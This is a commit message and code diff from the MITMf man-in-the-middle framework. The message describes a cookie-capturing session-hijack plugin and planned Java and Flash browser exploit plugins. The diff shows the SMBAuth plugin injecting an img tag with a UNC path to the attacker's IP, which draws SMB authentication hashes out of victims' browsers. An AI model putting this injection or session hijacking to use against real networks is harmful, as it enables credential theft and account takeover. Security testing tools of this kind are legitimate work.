Initial working PoC for the Ferret-NG plugin that will replace the SessionHijacker plugin: it will capture cookies and trasparently feed them to the proxy it starts up on port 10010 (by default), this way we just have to connect to the proxy, browse to the same website as the victim and we will automatically hijack their session! \o/

The way MITMf hooks SSLstrip's functions has been modified to improve plugin code readability, additionally corrected some useless function hooks that were placed in early framework realeases and never removed.

Replace plugin has been given it's own section in the config file

currently the BeedAutorun and Javapwn plugins have to be cleaned up...

BrowserProfile plugin's Pinlady code has been updated to the latest version (v0.9.0) and will now detect Flash player's version

Javapwn plugin will be renamed to BrowserPwn and will support Flash exploits too , as supposed to only Java exploits

Since we now have a built in SMB server, removed options to specify a host in the SMBauth plugin

Tweaked the output of some plugins

plugins/SMBAuth.py

@@ -21,20 +21,22 @@
 from core.utils import SystemConfig
 from plugins.plugin import Plugin
 from plugins.Inject import Inject
+from core.sergioproxy.ProxyPlugins import ProxyPlugins
 
-class SMBAuth(Inject, Plugin):
+class SMBAuth(Plugin):
     name     = "SMBAuth"
     optname  = "smbauth"
     desc     = "Evoke SMB challenge-response auth attempts"
-    depends  = ["Inject"]
     version  = "0.1"
     has_opts = False
 
     def initialize(self, options):
-        Inject.initialize(self, options)
         self.target_ip = SystemConfig.getIP(options.interface)
-        
-        self.html_payload = self._get_data()
+
+        inject = Inject()
+        inject.initialize(options)
+        inject.html_payload = self._get_data()
+        ProxyPlugins.getInstance().addPlugin(inject)
 
     def _get_data(self):
         return '<img src=\"\\\\%s\\image.jpg\">'\